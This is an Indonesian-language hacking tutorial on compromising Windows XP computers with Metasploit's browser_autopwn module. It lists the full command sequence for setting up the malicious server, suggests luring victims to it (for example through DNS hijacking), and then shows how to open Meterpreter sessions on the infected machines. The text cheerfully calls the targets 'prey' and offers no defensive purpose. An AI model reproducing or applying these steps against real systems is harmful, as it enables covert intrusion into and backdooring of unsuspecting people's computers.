Terdapat banyak vuln di windows xp yang dapat dimanfaatkan para attacker(hacker)
Seperti dengan mudahnya para attacker memasang backdoor di komputer target tanpa harus mengeksekusi backdoor/teknik soceng :v.
Salah satu metode exploit tanpa harus ada tindakan soceng yaitu autopwn browser. Cara kerjanya juga sulit disadari oleh korban, karena cukup dengan melakukan search ke alamat ip address attacker, backdoor sudah otomatis akan terpasang.
Autopwn Browser Exploit dengan Metasploit
Jalankan metasploit
Buat module backdoor dan exploit dengan perintah berikut
use auxiliary/server/browser_autopwn
set lhost 192.168.43.186
set lport 8080
set uripath /server
exploit
Ganti 192.168.43.186 dengan ip address komputer kalian
Tunggu beberapa saat hingga semua module exploit selesai dibuat
Kotak merahi di screenshot merupakan alamat backdoor yang sudah siap memangsa korban :v
Sekarang kalian hanya tinggal menunggu mangsa membuka alamat tersebut. Banyak cara untuk mengelabuhi korban agar mau membuka alamat tersebut :v, seperti dns hijacking.
Setelah si korban melakukan search ke alamat tersebut, maka metepreter di metasploit akan langsung terbuka. Mari kita explorasi pc korban wkkwkw
Ketikkan perintah berikut untuk melihat sessions (korban) yang sudah terpasang backdoor
sessions -l
Agar kita dapat berinteraksi (mengeksplorasi komputer target) ketikkan perintah
Kali ini saya memilih korban pertama (ditandai dengan angka 1)
sessions -i 1
Selamat bersenang senang :p